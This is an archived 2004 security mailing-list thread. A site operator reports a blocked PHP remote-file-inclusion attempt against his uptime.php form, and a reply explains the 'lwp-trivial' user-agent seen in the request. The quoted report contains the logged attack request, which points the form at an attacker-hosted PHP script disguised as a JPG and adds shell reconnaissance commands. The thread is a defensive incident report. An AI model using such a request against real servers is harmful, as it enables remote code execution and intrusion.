Re: Data Cha0s PHP script attempt
From: Pall Thayer (pall_at_fa.is)
Date: 10/04/04
- Previous message: Michel Arboi: "DllTrojan ?"
- In reply to: Kirby Angell: "Data Cha0s PHP script attempt"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Mon, 04 Oct 2004 15:33:28 +0000 To: Kirby Angell <kangell@alertra.com>
> I couldn't find much information about "lwp-trivial", but it seems to be
> not good for anything but badness. I guess I'll have to look into
> banning bots like this from our web server all together.
lwp is the www module for perl. lwp-trivial is the default user-agent
for perl scripts using lwp to access webcontent.
Pall
Kirby Angell wrote:
> Source IP: 200.203.109.237
> Attack: PHP form variable include
>
> Twice tonight our web server received URL requests like this:
>
> GET
> /uptime.php?pin=http://www.ka0ticl4b.hpgvip.ig.com.br/cse.jpg?&cmd=ls%20/;uname%20-a;w
> HTTP/1.0
> Host: uptime.alertra.com
> User-Agent: lwp-trivial/1.35
>
> The attack attempts to trick the uptime.php form into loading the given
> URL through one of the form variables. Our forms are highly paranoid,
> so that didn't work. Of interest though, if you haven't seen it (and I
> hadn't) is the script they tried to download:
>
> http://www.ka0ticl4b.hpgvip.ig.com.br/cse.jpg
>
> which isn't a JPG at all, but itself is a PHP page. I guess they
> thought that our "pin" variable was used in an "include" statement. The
> rogue PHP script does all sorts of interesting things such as, running
> commands (as in the attack above), gathering intelligence, attempting
> exploits, and setting up back doors.
>
> The script is apparently not too recent. It won't work on any default
> PHP install version 4.2 and above because it assumes the variables
> passed to it will be converted to global variables (see:
> http://www.php.net/manual/en/security.globals.php). Recent versions of
> PHP no longer do this.
>
> The attacking IP seems to be a radio station in Brazil. I have sent an
> e-mail to them informing them that they are probably compromised.
>
> I couldn't find much information about "lwp-trivial", but it seems to be
> not good for anything but badness. I guess I'll have to look into
> banning bots like this from our web server all together.
>
> --
> Thank you,
>
> Kirby Angell
> Get notified anytime your website goes down!
> http://www.alertra.com
> key: 9004F4C0
> fingerprint: DD7E E88D 7F50 2A1E 229D 836A DB5B A751 9004 F4C0
-- _______________________________ Pall Thayer artist/teacher http://www.this.is/pallit http://pallit.lhi.is/panse _______________________________
- Previous message: Michel Arboi: "DllTrojan ?"
- In reply to: Kirby Angell: "Data Cha0s PHP script attempt"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
